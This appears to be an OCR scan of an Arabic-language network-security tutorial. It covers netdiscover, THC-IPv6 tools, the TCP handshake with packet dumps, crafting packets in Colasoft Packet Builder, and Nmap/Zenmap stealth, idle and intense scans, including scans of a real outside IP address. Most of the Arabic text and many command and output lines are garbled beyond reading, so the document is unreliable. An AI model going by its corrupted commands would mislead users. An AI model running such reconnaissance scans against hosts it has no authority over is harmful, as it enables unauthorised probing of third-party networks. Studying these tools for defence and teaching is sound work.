Written by: Jaime Penalba <jpenalbae@gmail.com> 



sage: netdiscov 
-i device: you 
-r range: scan 



[ -i device] 
network devi 



[ - r range 



count : r 
enable f 
ignore h 
enable s 
print re 
in parse 



i a give 
the lis 
:Je : do n 
stomize 
to slee 
ip octe 
uer of t 
tmode sc 
s config 
sp time 
Lts in a 
9 output 



n range l 
t of ranc 
ot send a 
pcap filt 
p betweer 
t used fc 
imes to e 
an, saves 
files fc 
sup ressic 
format s 
mode ( -F 



sad of auto sc 
:ontained into 
"ling, only sni 
expression [de 



If - r, -1 or -p ar 
la : ~# | 



not enablec 



netdiscove r 



e | -p] [ -s time] [ -n node] [ -c count] [ 

an. 192 . 168 .6 .0/24, 716, 78 

the given file 
f f 

fault : "a rp " ) 

( miliseconds) 
2 to 253) 

es (for nets with packet loss) 
ecommended for auto 
st mode 

uest [hardcore mode) 
ng by another program 

ning after the active scan is completed 
scan for common lan addresses. 



[-f] [-d] [-S] [-P] 



uj^i netdiscover j*VI ^M-^j ^ijj^ V jl aj^Luj $.1 jjuj tiL <1»jj^<J! CjI^jJJ! o^*A a ^ (j^j 



Currently scanning 
97 Captured ARP Rec 


172.23.31 .0/16 
}/Rep packets, fr 


1 s 

om 6 ho 


c reen 
sts . 


View: Unique Hosts 
Total size: 5820 


IP 


At 


MAC Address 


Count 


Len 


MAC Vendor 


172.16.11 .9 


QG 


90:27:b7:e9:3c 


08 


480 


INTEL CORPORATION 


192.168.16.70 


00 


le : ec : af : f b : 65 


43 


2580 


COMPAL INFORMATION (KUNSHAN) CO., 


192.168.16.1 


00 


05:b4:04:78:b© 


35 


2100 


Aceex Corporation 


192.168.16.71 


00 


3O:67:0f :af :4f 


09 


540 


BIOSTAR MICROTECH INT 1 L CORP. 


172.16.11 .69 


00 


90:27:b7:e9:3c 


01 


060 


INTEL CORPORATION 


172.16.11 .105 


00 


90:27:b7:e9:3c 


01 


06© 


INTEL CORPORATION 


1 













(192.168.16.70 - 192.168.16.71 - 192.168.16.10) ^Vl ^jUJI ^ ^ ^ cA£^\\ <> a* ^ ^ ai\ Ua i^^U 
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I^VIS (-r) ft^lkluL Ajjj ^t A<*u*\\ jUaj ^j^j <j£as 



#netdiscover©-i©wlan0©-r©192.168.1.0/24 (Scan a class C network, to see which hosts are up) 
#netdiscover©-i©wlanO -r©10.0.0.0/8 (Scan a class A network, trying to find network addresses) 



^ (*vs ill A)\ac c_a jjoj (cill a£jJo3I ^j^il j^xjII 

passive_discovery6 ■ 

.IPv6 ojj^ ^ sj^Vl c> ^> u-^i c> .HC-IPV6-ATTACK-TOOLKIT ^» <> lsj^ *W 



# passive_discove ry6 
passive_discove ry6 v2.G (c) 2012 by van Hause r / THC <vh@thc.org> www.thc.org 

Syntax: passive_discove ry6 [ -Ds] [ -m maxhop] [ -R prefix] interface [script] 



Options : 
-D 
-s 

-m maxhop 
-R prefix 



do also dump destination addresses (does not work with -m) 
do only print the addresses, no other output 

the maximum number of hops a target which is dumped may be away. 
0 means local only, the maximum amount to make sense is usually 5 
exchange the defined prefix with the link local prefix 



Passivly sniffs the network and dump all client's IPv6 addresses detected. 
Note that in a switched environment you get better results when additionally 
starting pa rasit e6 , however this will impact the network. 

If a script name is specified after the interface, it is called with the 
detected iov6 address as first and the interface as second option. 



thcping6 ■ 

Sjjill ^ 1 A> n , n \« ICMPv6 tus-i thcping6 f HC-IPV6-ATTACK-TOOLKIT <> M 

thcping6 <options> <interface> <source-ipv6> <destination-ipv6> 



(CHECK FOR OPEN PORTS) **j3Ld iaLUil 3.3 



jt U&aJ ^jaJ j tcJl^VI <xjIS tSLJ <jVl 

^Uaill ^^ic fallal t CjLq^lSI c _^& Ui ^j^j j 4a. j^Lg iat_L<Jt ^ ^) ai^j j& (port scanning) i^a]l o-*aai 4jUr. ^ c ^jojLojV1 t a^-lt 

jt 6<cU]a3l j ( (FTP)**— d ^^t cJ^ J JJ^V^ ^L>^ <-! jfi jJJ^^H l^J ^ajlj S^Aa-a A aqa j\ Al^a j <La,laJt m < V^lm^lt 
Jjijuj ^^ic t . u^J L_fl jjoj (JA ^.JJ^ ^ <-L>^ (J^-^Jt i^t J^J 4-^ ji^^ t *°^^ * CS"^ (J^ 3 ^ (J^ 1 ialAxJt (J^aa^ .L-JJjlt '" iLa 9 ^J^5J 

jt l^-Gj ialixJt/cijljjjJt . jj J£ 6^ ja. iflliall (65<535-0) 65^536 .iii^lt liA ^viun ^ill c_±jj3t ^U. 
t> s^liiuuJt ^U^aJt t^Uituser datagram protocol (UDP) ^transmission control protocol (TCP) H 

.iiiJt Cj^aJ ^t diVl^iVt <at-nL jt CjjjJt/iiiJt t^A 

4 jl^aJt ti^ (j-a ^a^ii3 JjJaflt ojjj^ 1 lllaxJ t^A .4_a. jliixJt jt A * laJLuiASt Cjljjji3t/iaLL<Jt ^^Jb U» Ai^sLxJ jj jj;^^ ^^-^■^ Q^^^ L>^ 

.AlLia>l ^ ^ A-iiia <J ja. (JjJaflt \ ilA Jj^ '(^^t j 

^jj^jjC. Alajoat jj <!LUa dbaj Nmap .Nmapj^^ < — * ^ tialL<Jt (j-^aa^ ptja-V Ja^S 6^a.t j <Ljoj j jUaJ (jt Ale ^jl£ tit 

aj\ ft jit ><j? K tdli ^ Uj L >AiJ CjUjJjj ^ ^AxJt ^ Cinj . www.insecure.org ^ uj^ "jj^j^" 

.(terminal) Aja^Ut (jy^ia ijp> \ $ ^ laJLujt Uiajt ^Luj l_a jjoj U^3j '(GUI) j^^^ ^ laJLuiAlt <^a.tj ^ Nmap cJ^*^ (ja^uJt 

Ls lc ^UucVt J-atjVt jiaxw at iklujt ^alsu Q\ UjIc ( . la>J tiUJ ^JjlLoiJ t jJJa 4_L^aj£3tj ^j-oVt ^Uaj ^ ^t^a. ^aA (jjill ^j^alauu^Vt 

ot^Vt ^t^aJLoat lit jt .t.Aa. jnjmj ^^)3t dljau] ^dt jVt ^ajuj ^t^aJLujt ^jl ^j-d (jj^ nij La LJlc. ^jjjUlt (jjoij .■'S-Ld jjuj^)3t ^^aJjaixJt <^a.t j 

tjVt jk^^ 

. JUlt ^jiauJt ^t ciL 3 >^U\I dit jl^JI ^i^ ^jjj ^ULJt ^jj^j automationj Scripting .^J^^ 
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^Jajuj J- La jj jJi^I] 4^I^JjujI ^jl ^1 . IjJJ^ Jjoijll ^a^JjaixJ! <g_a.lj jj^lkluij 4_L^aj£3l ^3lc ^1^. ^aA (JJ^I (JjAjII ~^"» a 
(jj^J L_fl jjoJ a fljl h jll ^Saa A ^ L— Ll^ iAaJ Ld Ij^U 6(j£-<Ui jJjljjjaJl lifc ^jl (j-G ^^1 CS"^* .^-^-^l J (J^ ^ J ( ♦ ^^1 

j-gI jVI jiajuj) J^JI ^ . (backdoor) I J j^a jll jl J^l ^ ^ admin cjU^^s J jj^*JI is ^±i jll cila^A 

^ajujj el li^ (remote shell) ,J * J CP- ^>*l j*^l ^ ajuj *\ ^52 * >1 W 'W^* l!-**^ (^1 ^>*l jVI ji=^ jl lB-^j^I cJ*^ ,j*^ j 

(j^aLiJ! dll j^Vl (j* J*l jVI jia^J ^isu .1 V^lm^l jl^aJl ^^ic IaJjAjj ^aJ tc*L (j-aLkll JJ Jjj^l j^^- ^^Jc jxil jVI Jbk^U 

^ ^Jl ^xJl / alia a ^cjllj ^CJJJ 1 ^ > ^jj ial_L<J| ^ alia a ^1 jjl ,L_fl^Jl liLali 1 ^jlc> Jj^aJ ^^jll AjL^JjujVI ^ 

O^aai ^1 4Ja^!la ^jj . jl^aJI ^ 4a UDP J> TCP ^J^J <> jiaaJt JSlliJI <>aai ;4ia jsIa 



THE THREE-WAY HANDSHAKE 




Bi " Th^.w^H-d.h.k, Shee ' a 

10.0.0.2:62000^ ► 10.0.0.3:21 



Ok ,l 




CjUiL^ dj^iill jU^iml J^U ^> fcdli Jxij l^jli 4 TCP 
1^ <£jt^ ^ ^iUxJI ^ .(The Three - way handshake) 

Jjjj Lalk. (jJj^al<Jl <Jj^J (J^i^ /Ml ^JXJ Jj3 JSVI ^5^) Aj^I^J 
c fljl^Jl ^-<ft.>.>iJ (^ilLall '^^1 ^ ; lilaJ j L_fljlg_II iafliiti tUi ^j^>^ ui ^ Cj^jII 

^ C5 ill<JI jli 4<!UJI oi^ ^ Ax^xi tillx-a tU^^" J jllU 

. ^UslxJ1£ 4j^l^<Jl <L^al j>J CjUi jIslxJI ^Q^j ^jjS jUl 

^gjllill jj jjj^ll ^11 (J jVI JJ jJfx^ll -laJJJ .■'UjUui ^jUr> (J!^. £yz ^jjjAij 

^1^1 jj* j±i*£l\ jl£ lil .^^<i iiid ^aj ^1 SYN J^j] (j&j^ 3 
.SYN/ACK ^> JL-jW ^™ .(listing) ^UL,VI ^jj 

^> ^ .SYN/ACK JjV j^j^l JW^U^ 

■ C3 T .-. ^ cJ^*^ ^ > J ^ Jj^l J^l (Jj jl 6<Jaii3l Aic. .ACK 

g^l Jl^JI U JUj c? L^Vl sJUJI jli ."c-il^JI Jli." 6 ^l Ultia ^ 

Jlc jx." Jlaj cJLil^jl Jaiill ^ill C5 iJiall .SYN ^> J-JJ 

<xi Jlft ^aij lAjjxjj ^li C5 i^aVI Jj^al^l j SYN/ACK ^-O^ 

RST jl FIN ^> J^-jl ^ ^ J^VI J!tel & .ACK 



(ESTABLISHING A TCP CONNECTION)?TCP JL^St f 
^jujI ^ ^jjal jll (jxi .(The Three way handshake) ciiUiU^ dj^lSlI ^LujI TCP Jl-^l o*±^ ^ tlLLoj Ll^SLj L£ 

.4_LoUJJ dj| j^>^ ^ (JIj^jVI ^Ujdj] jl^jj ^JJ (jl N Nt ^31 ^-J jLujVI 

http://support.microsoft.com/kb/172983 :j^^ll 
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LA. 



t*jC^>J^ SYN .(TCP 



- TCP J^l gyiuit J^ui j^laj 

Frame 1 ■ 

.S.) SYN p>1I lUj^ <NTW3 0^1 * J jVl jU»yi ujj^ ^ 



J » nl i. nil ^jVI c> 6 jW^ .(synchronize sequence numbers) y& J] aIujjj ^3 <J***J1 
41^13 .^L3I J) l^UJ ^ ^Ij .[1,8221821+1=8221822] g^j <(ISN {Initial Number Sequence}) 

Maximum Segment Size (MSS) jW^ .<>»*JI 6 ^ J^Ld! ^15 J > ^UJ! j J^l jjj JU^il 

lUj-JI maximum segment size m ^ .(len:4) length c> ^ ls^j '^y* 2 <£^' 

.The Three way handshake *jLc t> JjVl * >JI ja li* (ACK: 0) J) ^ ACK J^JI ^ Jj^J! 

1 2.0785 NTW3 — > BDC3 TCP ....S., len: 4, seq: 8221822-8221825, ack: 0, 
8192, src: 1037 dst: 139 (NBT Session) NTW3 — > BDC3 IP 



win : 

TCP: 
dst: 



S., len: 4, seq: 8221822-8221825, ack: 0, win: 8192, src: 1037 

139 (NBT Session) 

TCP: Source Port = 0x0 4 0D 

TCP: Destination Port = NETBIOS Session Service 

TCP: Sequence Number = 8221822 (0x7D747E) 

TCP: Acknowledgement Number = 0 (0x0) 

TCP: Data Offset = 24 (0x18) 

TCP: Reserved = 0 (0x0000) 

TCP: Flags = 0x02 : ....S. 



TCP. 


' . .0 = 


No urgent data 


TCP. 


• . . .0 = 


Acknowledgement field not significant 


TCP. 


• 0. . . = 


No Push function 


TCP. 


• 0. . = 


No Reset 


TCP. 


• 1. = 


Synchronize sequence numbers 


TCP. 


• 0 = 


No Fin 



TCP: Window = 8192 (0x2000) 

TCP: Checksum = 0xF213 

TCP: Urgent Pointer = 0 (0x0) 

TCP: Options 

TCP: Option Kind (Maximum Segment Size) 
TCP: Option Length = 4 (0x4) 
TCP: Option Value = 1460 (0x5B4) 



00000 
00010 
00020 
00030 



= 2 (0x2) 



TCP: Frame Padding 



02 60 8C 9E 18 8B 02 60 8C 3B 85 CI 08 00 45 00 

00 2C 0D 01 40 00 80 06 El 4B 83 6B 02 D6 83 6B 

02 D3 04 0D 00 8B 00 7D 74 7E 00 00 00 00 60 02 

20 00 F2 13 00 00 02 04 05 B4 20 20 



.E. 



. .K.k. 
}t~. . . 



Frame 2 ■ 

c>(SYN) cfe r^Jt *>ll Iaa ^ .(.TCP. A.. S) fcUaill \* J* SYNj ACK J- <BDC3 ^ ^ jU»yi <j 
JjojjI ^ilt SYN JjuoLonll ^jll bjuc j& L_Akll li* . J^**^ Jj(ACK) s-^ \ > >*\\ J^jj ^UJI <£jS jll ^ ,<>»lj2ll 

.(8221823) ^ ^ Uilk c> .(Acknowledgement number) ACK Ls ^. V&j aJI \SL±* Jj*JI <> 
. Jj^xJ) i^jL^j) SYN ACK (J Jj**il Ja2a CjUjI Acknowledgement number 
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2 2.0786 BDC3 — > NTW3 TCP .A. . S . , len: 4, seq: 1109645-1109648, ack : 
8221823, win: 8760, src: 139 (NBT Session) dst : 1037 BDC3 — > NTW3 IP 

TCP: .A. . S . , len: 4, seq: 1109645-1109648, ack: 8221823, win: 8760, 
src: 139 (NBT Session) dst: 1037 



TCP: Source Port = NETBIOS Session Service 

TCP: Destination Port = 0x040D 

TCP: Sequence Number = 1109645 (0xl0EE8D) 

TCP: Acknowledgement Number = 8221823 (0x7D747F) 

TCP: Data Offset = 24 (0x18) 

TCP: Reserved = 0 (0x0000) 

TCP: Flags = 0x12 : .A..S. 



TCP. 


' . .0 


TCP. 


• . . .1. . . 


TCP. 


• 0. . 


TCP. 


• 0. 


TCP. 


• 1 


TCP. 





0 = 



No urgent data 

Acknowledgement field significant 
No Push function 
No Reset 

Synchronize sequence numbers 
No Fin 



TCP: Window = 8760 (0x2238) 

TCP: Checksum = Ox012D 

TCP: Urgent Pointer = 0 (0x0) 

TCP: Options 



TCP: Option Kind (Maximum Segment Size) = 2 (0x2) 
TCP: Option Length = 4 (0x4) 
TCP: Option Value = 1460 (0x5B4) 



TCP: Frame Padding 



00000: 02 60 8C 3B 85 CI 02 60 8C 9E 18 8B 08 00 45 00 . \;... x E. 

00010: 00 2C 5B 00 40 00 80 06 93 4C 83 6B 02 D3 83 6B .,[.@ L.k...k 

00020: 02 D6 00 8B 04 OD 00 10 EE 8D 00 7D 74 7F 60 12 }t\ 

00030: 22 38 01 2D 00 00 02 04 05 B4 20 20 "8.- 



Frame 3 ■ 

J^l ^viun .<>! jsll ^Lkll c> *>fl liA <J .(TCP .A.... ) ACK lUjj <£jI12I jlLyi ^ 

{3L1\ lU j*H mIUI Jfc\ . (Acknowledgement number) J jSyt ^ j ^ ^SLll/^UJI ^ jj 

^UucVl (jU-aj| ^jjjJjojIj A\\aC <JLu£! ^1 (j-al 

3 2.787 NTW3 — > BDC3 TCP .A...., len: 0, seq: 8221823-8221823, ack: 
1109646, win: 8760, src: 1037 dst: 139 (NBT Session) NTW3 — > BDC3 IP 



TCP: .A...., len: 0, seq: 8221823-8221823, ack: 
src: 1037 dst: 139 (NBT Session) 



1109646, win: 8760, 



TCP: Source Port = 0x0 4 OD 

TCP: Destination Port = NETBIOS Session Service 

TCP: Sequence Number = 8221823 (0x7D747F) 

TCP: Acknowledgement Number = 1109646 (0xl0EE8E) 

TCP: Data Offset = 20 (0x14) 

TCP: Reserved = 0 (0x0000) 

TCP: Flags = 0x10 : .A. . . . 



TCP. 


' . . 0 


TCP. 


• . . .1. . . 


TCP. 


• 0. . 


TCP. 


• 0. 


TCP. 


• 0 



= No urgent data 

= Acknowledgement field significant 

= No Push function 

= No Reset 

= No Synchronize 
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TCP: 



0 = No Fin 



TCP: Window = 8760 (0x2238) 

TCP: Checksum = Oxl 8EA 

TCP: Urgent Pointer = 0 (0x0) 

TCP: Frame Padding 



00000 
00010 
00020 
00030 



02 60 8C 9E 18 8B 02 60 8C 3B 85 CI 08 00 45 00 

00 28 OE 01 40 00 80 06 EO 4F 83 6B 02 D6 83 6B 

02 D3 04 OD 00 8B 00 ID 74 7F 00 10 EE 8E 50 10 

22 38 18 EA 00 00 20 20 20 20 20 20 



. s e. 

. (. .@ O.k. . .k 

}t....P. 

"8 



(TCP cjU^)tCP communication flags 

^ CjU^UJ! *•* .(flages)^U5Ull o^u J^j -ul ^i ^Ull TCP JI— 31 J (TCP Header) TCP ^> ^ j i> 

;TCP JI— 31 CjU^ Jj Uuaj m jXM\ JI CjUAu *Uac]j 
4JU1J j| 4JLaj ji ^c. (new sequence number)**^ ^LiL^ ^ j Jc J^j .Synchronization jL-a2aJ j& :(SYN) 
SYN ^i^aJU ^UJI JxuLull o jU^ j JL^jVI <jI ^^Ixj 11a .Acknowledgement J jl— 3*.! y> :(ACK) 

.^1 j JI lil.Ja.rt 

.<jjp^3l CjUUJI a^jj jlrit ^3 L-iUaJl Jjij jalj ^Uail! jl ^^Ixjj .PUSH J J>^1 :(PSH) 
. Cjij c_j jSi J U j^j Jll ^ jaJI J j! jl! CjUUJI JI ^ jj .Urgent J jl— 3aJ j>a :(URG) 
.^ixJI ^Uaull JI ^ jaJl <> ^1 jl <j| j .Finish J jU-aS^I :(FIN) 

. JL^iV! o^i sjlftl ^ixjj .Reset J >^l :(RST) 
cjU^UJI r l^kU .RST j ACK ^SYN ^ j *^U3U1I j.^j.^jj^ cU^ (SYN scan) SYN o-^ 

. (enumeration process)^^^^ 4_iLc. *L£| ^1 jaJl ^ <n jftl cjU ^a^J 
(CREATE CUSTOM PACKETS USING TCP FLAGS) TCP *Uils ? l^b <u> f LiSj 

http ://www.colasof t.com : j^-a-JI 

> <allai a\\ djU^gJI Ajja a£jJJI ^ ^jjaall U^ajl ^xujjjj 4 > ^ ^ ^LijL till ^ajujj stal Colasoft Packet Builder 

J 'hexadecimal editor 'decoder editor J l$35LWl*3l ji^u j <s ji jiJI c_JI jSII <> TCP ^ ^^3 t*U jaulj <uli 
r >II c^L JI ^>JI iai^ LjJ ^ Colasoft Packet Builder *f>ll Jj Ait^yu -^J^ 1 ASCII editor 

JI p >ll Jl^jlj 

^ji^j Ljajl .4_1^juj <L^)iaj (j;is«-^ J j3j^ J Jjasu ^ QiA^iudl £lau& q^. ^ W^j^^ jll Decode editor 

TCP Packet j ARP Packet 'IP Packet 'Ethernet Packet sJlj^l c> c> ls^ 1 liA 

<J^1 

;4JU3I ^Uill j^Jaji s jaxJI ^jjLVI J^ iai^jall ^jia 4 U .ni ^ Colasoft Packet Builder c^f^ ^ -1 



Colasoft Packet Builder 



File Edit Send 



Help 



Import 



:xport T 



Add In&ert 



IS X. I ^ W 

Paste Delete | Move Up Move Dowr 











Checksum 




Adapter 


About 



Cofasoft 



' Decode Editor 



' Packet List 



Delta Time Source 



Destination 



' Hex Editor 



< 
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. JLjj^I <A*xl l^a^ioLi i_i jxji ^1 4<,u*\\ ^j^jI Vji ADAPTOR u — °: ? 3::^ ^ ^1 <Jja -2 



File Edit Send Help 



Colasoft Packet Builder 







X 












Import 


Add Insert | Copy Paste 


Delete 


Move Up Move Down 


Checksum 




Adapter 


About 



Colasoft 



Decode Editor 




Select Adapter 



Adapter: 



Realtek PCIe GBE Family Controller 



Physical Address 


00:1£:EC:AF:FB:650 


Link Speed 


100. 0 Mbps 


Max Frame Size 


1500 bytes 


IP Address 


192. 168. 16. 70/255. 255. 255.0 


Default Gateway 


192.168.16.1 


Adapter Status 


Operational 



Help 



<u> Add ^ o^V! c& 6Jb .Add jl Insert U KPACKAGE) ^ -3 

jyft Add package j^^j ^ l3jj^^ l^Jc ^jlill <L* j^JI ^^ic AiUiaV ^vimi Insert ^ 

TCP Packet ^ >aij5 ^1 ^ .<JI jill ^> u& ^ ^ j±z ^ 



Colasoft Packet Builder 



File Edit Send Help 
Import 



Add 



Insert | Copy Paste Delete | Move Up Move Down 



Checksum 



w # 

Send Send All Adapter About 



' Decode Editor 



Source 



Add Packet 



Select Template: TCP Packet 



Delta Time: 



0.1 



Second 



Cancel 



Help 



rg Hex Editor 




U&aj l^J^k <> ^Ij aJUII ^U3! j^tua OK ^ > ^ "TCP Packet U j^l ^Au 3 g^ 1 & J 3 J 1 ^ 1 ^ -4 
£^ Colasoft Packet Builder <j£^ .Packet list o'j^ s^M^ ajjj 

.hex editorj decode editor cj! jj^JI <> u^j^ ^ decode information Ail^L 
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Colasaft Packet Builder 



Import Export- 
Decode Editor 



Send Help 

Add Insert 



Copy Paste Delete 



Move Up Move Dow 



Checksum 



Send 



Send All 



Adapter About 



B-T 3 Pactet Info: 

{jl] Packet Numbe r : 
<=P Packet Length : 
<=P Captured Length: 
{jg Delta Time 
Ethernet Type II 



f De s t ina t i on Addre s s : 
) Source Address: 
<=P Protocol : 
IP - Internet Protocol 



© Version 

© Header Length 

© Differentiated Services Field 

■© Differentiated Services Codepoint 



0000 
000E 
0012 
002A 
0033 



00 00 00 00 00 00 00 00 00 00 00 00 oa 00 

45 00 00 2E 00 00 40 00 40 06 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 50 00 FF FC 00 00 00 00 00 00 

00 00 00 00 



3 



000001 
£4 
£0 

0.100000 Second 

[0/14] 

00:00:00:00:00:00 

00:00:00:00:00:00 

OxOSOO 

[14/20] 

4 [14/1] 

5 (20 By 
□000 0000 [15/1] 
0000 00.. [15/1] v 

> 



Total byte: 




Packets 1 Selected 



1 



No. 


Delta Time 


Source 


Destinatio 




0.100000 


0.0.0.0:0 


0.0.0.0:0 



ls^jj ^ jjuj Jll j send all i*™ <jc ^jaJI £^ Jl^jl \ $ £ *j ^^lh cs-^' j^Jl ^jSJI ^ -5 



Colasoft Packet Builder 



File Edit Send Help 

Import Export"' Add I 
^ Decode Editor 



Copy Delete | Movi 



Adapter 



About 



Pacfcet Info: 
!■- Packet Number: 
i-HeT^ 1 Packet Length: 
l -i^p Captured Length: 
Delta Time 
Ethernet Type II | 
> Dest ina t i on Addre 
J Source Address : 
■i=pj Protocol : 
IP - Internet Protoc 



version 
Header Length 
Differentiated Se 
© Differentiated 



Hex Editor 



0000 
000E 
001C 
002A 
0038 
< 



00 00 00 00 00 00 0C 

45 00 00 2E 00 00 40 

00 00 00 00 00 00 QGL 

00 00 00 00 50 00 FE 

00 00 00 00 



Packet Mol7 1 # Packet List 



Send All Packets 



Packets | 1 | Selected | 1 | 



Options 

Adapter: Realtek PCIe GEE Family Controller 
► O Burst Mode [no delay between packeta) 
O Loop Sending: Z \ loops [zero for infinite loop) 

Delay Between Loops: 1000 ^ j milliseconds 



: 1 Source 


Destinatio 


0.0.0.0:0 


0.0.0.0:0 



Sending Information 
Total Packets: 
Packets Sent: 
Progress: 



Stop 



Help 



. JL-jVI aJ^ gi l^a Start £ Burst Mode -6 
jlikj File jl s^jujU-o Export ^* > ^ l^j^ 3 ^ ^Jc- ^jlill J-gjlII aj -7 

.<Lg^J| Uo^'i <j| Aljj (5^1 cil^lkj 4_uib*i J£ laJ U^j Export 



IPV6 cjjj^ ^ cjlLuiil 

,4_ic^)i3l aSliA IPv6 ^ g * ^ <^^l (o^-^ 264 j> t ^jl jjc *L^Lu^ dij 64) (t * w ^ ^Liaa ^£ < ; ^j^. Jal UjLoi^. 

Cj\£jj^31 ping sweep V Nmap lsj^ j^aill j^l L^aj) j IPv4 6^ j ^^*-^ a IPv6 ^f^> o-^^ 
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^jjiljJa^ll ^^c ^SL tJPy6 A£f^j (j^ai .IPv6 U^J^ •^•^j] 4iJjjj-oJl jUa.VI lS^^J J> <^ JJ-^V^ ^LH^ J 

NMAP 



http ://nmap.org : j^Jl 

^oljVl jl ^AaJLujj sbl ja nmap ^"j^ cJ^-^ .^^-^ o^j*-} ^ W^ 2 ^ ^j^j c V^*nn<^l c Luia^ll \ > dm > j ^^ill 

,4£jjoJl C5 ic 4_L^lLaJl *ft^_^.VIj ^-a. jllixJl L_j|^ij3l Q^JCj djl^Jjuoll jUlkU StaVI £>i& f J^J 
^Uaj ^ jj j <Lal*Jl ft j^Vl (jc c flj&l] ^a^kjjaaj £Lx»liji3l /ft j^Vl j 4£fJol3 (jl j±L\ 4jUr. ^1 ^^lilil e-llxkVl j djl^sull c al ^jji^j 

.La^Ia j£J j^al jVI jI^-m ^ J-axj Luajj j jn^nl j Jj^Lj JJLulU! ^Uaj qa JSJ 4^4 j-uu j]| AajJI ^ f I j-uu plsu dUVI d^t 



<Lg jL.il a] 1 >!> <aL L-flJjJa-oJl Jasu CjLqJI^JI 

TCP Connect / Full Open Scan 

Stealth Scans: SYN Scan (Half-open Scan); XMAS Scan, FIN Scan, NULL Scan 
IDLE Scan 

ICMP Echo Scanning/List Scan 
SYN/FIN Scanning Using IP Fragments 
UDP Scanning 
Inverse TCP Flag Scanning 
ACK Flag Scanning 

i^im l^jJI £ja Sjbj List of TCP and UDP port numbers dijjjlS 
http://en.wikipedia.org/wiki/List of TCP and UDP port numbers 

jt jj^j command prompt jl ls* J^»j^t ^ f tj^ Jjjla CP ^ nmap J^iS ^ 

l^LL^j fjjj zenmap jl nmap ^-4jaJI Aia^ljj t ^lnn ^jj ^31Ij Zenmap (j^* o-^J ^4 Nmap . j^tjSfl J^aL 

.zenmap jl nmapfe >»Vt 4ia«ljj 

j^ljV) j^-u ^ JUi) jLuJ) ^jjjla 4J djj^ ixuuj) ^ nmap J^*-^ ^ 



#nmap©173.194.39.17 
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nmap 173.194.39.17 










Starting Nmap 6.4G ( http://nmap.org 


) at 2G14 


-G3-20 


22 


:10 EDT 


Nmap scan report for hamG2sl3 -in - f 17 


. lelGG .net 


[ 173 . 


194 


.39 . 17) 


Host is up [0.21s latency) . 










Not shown: 997 filtered ports 










PORT STATE SERVICE 










25/tcp open smtp 










SG/tcp open http 










443/tcp open https 










Nmap done: 1 IP address [1 host up) 
:-# | 


scanned in 


20 .20 




zonds 



a a( J?£\£ QUI j-uujil AJjJl a| laJL ub djj^ k.uii\ ^jl Luajj A LjLuu (J^-ajj JjjS i^jj V Jj-lLj JjLuuJ) ^Usj Liajj ^ j-uuj lift 



Scan Tools P_rofile H el p 
Target: 



173.1^4.39.17 



Zenmap 

E] 



c 



Profile: 



Intense scan 



Scan 



Cancel 



Command: nmap -T-4 -A - v 1 71: . "I 9-4. I: 9. 1 7 



H o sts 



OS * Host 



Nmap Output 



Ports / Horslbs | Topology | Host Details | 5c 



nmop -T4 -A -v 7F3.794.39. 7Z 



3 i 



D eta i I s 



Filter Hosts 



l o-F 1 host . at 84:14 
o-F 1 host, at 94:14^ 



Star-ting Nmap 6.48 ( http://nrnap.cnrg ) at 2014-'93-21 
04; 14 E g/pt Standard Time 

N5E : Loaded 118 scripts -For scanning. 
NSE : Script Pre- scanning. 
Initiating Ping Scan at 84- : 14 
Scanning 173.194.39.17 [4 ports] 

Completed Ping Scan at 84- : 14 j. 8.94s elapsed ( 1 total 
hosts) 

Initiating Parallel DNS resolutior 
Completed Parallel DNS resolution 
5.59s elapsed 

Initiating SYM Stealth Scan at 84- : 14 
Scanning ha m92 s 1 3 - i n - f 1 7 . 1 e 1^9 . r 
[1888 ports] 

Discovered open poi — t S8/tcp on 1 
Discovered open poi — t 2 5/tcp on d 
Discovered open poi — t 443/tcp on 
SVNI Stealth Scan Timing: About 1 
(8:81:86 remaining) 

Completed SVN1 Stealth Scan at 8^ 
(1888 total ports) 

Initiating Service scan at 84 : 15 

Scanning 3 services on ham82sl3-in--F17.lel88.net 
( 173 . 194 .39.17) 

Completed Service scan at 84 : 16 h 41 , 28s elapsed £3 
services on 1 host) 

Initiating OS detection (try #1) against h a rn8 2 s 1 3 - i n - 
fl7.lel90.net (17 3.194.39.17) 

Retrying OS detection (try #2) against h a rn8 2 s 1 3 - i n - 
-F17.lel88.net (173.194.39.17) 
Initiating Trace rout e at 84-: 16 

Completed Traceroute at 04:16j B_18>s elapsed 

Initiating Parallel DNS resolution o-F 3 hosts . at 84 : 16 
Completed Parallel DNS resolution o-F 3 hosts . at 



et 


(173 




194 




3 


73. 


194 . 


3 


3.1 


7 




73. 


194 . 


3 


9 . 1 


7 




173 


.194 




39 . 


1 


7 


1.9 


53G d 


o 


ne i 




E 


: 15 


, 53 




lis 




e 



84 : 16 



£ ^jj^ (j-a^i j Instant scan U jikl j ^-a^All ^ jj U»^b j Profile <AaJI c^j IP > t^ 3 jt ^ Target ^ 

4^j\i3l j (Nmap Output - Ports/Hosts - Topology - Host Details - Scan) u£ 

mU ^\\ ^jU ajjJ cillij (Hosts - Services) <>jVi v^M' 

A > <~i\ \\\ ^j^^kW CjUjflJ (j* ^a^JjaaJ q\ ^JjJ liLa l_£J j AjjJal JJ^VI JjJC- 4 kY)^ a laJ ^ja £jJa j Profile ^ 



-L> a^i3l l^ja (j jL\ j^ia new profile profile ^ ^ > «*M c&j^ nmap^ 



Zenmap 



Scan Tools 



Target: 173 
Command: 



Profile Help 



New Profile or Command Ctrl+P 



Edit Selected Profile 



Ctrl+E 



6 



Intense scan 



3 



Scan Cancel 



Hosts Services | Nmap Output Ports / Hosts] Topology Host Details Scans | 
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Profile Editor 



_ n 



nrnap -T4 -A -v 173.194.39.17 



Scan 



Profile 



Scan 



Pino 



Scripting 



| Tar gel | 



Source 



Othei | Timirvg^ 



Profile Information 

Profile name 
Description 



ACK SYN| 



Help 

Description 

The description is □ full description 
of what the scan does., which may 
be long. 



I^VIS ^A^jj ^1 (j-a^ill CjIusj jUkj scan £ profiled ^ ^ 



Profile Editor 



nrnap -sA -sU -T4 -A -v 173.194.39.1 7 



Scan 



Profile 



Scan 



Ping | Scripting | Targel | Source | Qthei | Timirtg 



Scan options 



Targets (optional): 




TCP scan: 


ACK scan (-sA) 


lyj 


Non-TCP scans: 


UDP scan (-sUJ 


M 


Timing template: 


Aggressive (-T4) 


M 


Enable all advanced/aggressive options (-A] 




1 I Operating system detection (-O] 




1 1 Version detection (-sV) 






□ Idle Scan (Zombie] (-si] 




1 1 FTP bounce attack (-b] 





I I Disable reverse DNS resolution [-n] 
I I IPv6 support (-&] 



Help 

IPv6 support 

Enable IPv6 scanning. 



.Cancel 



Save Changes 



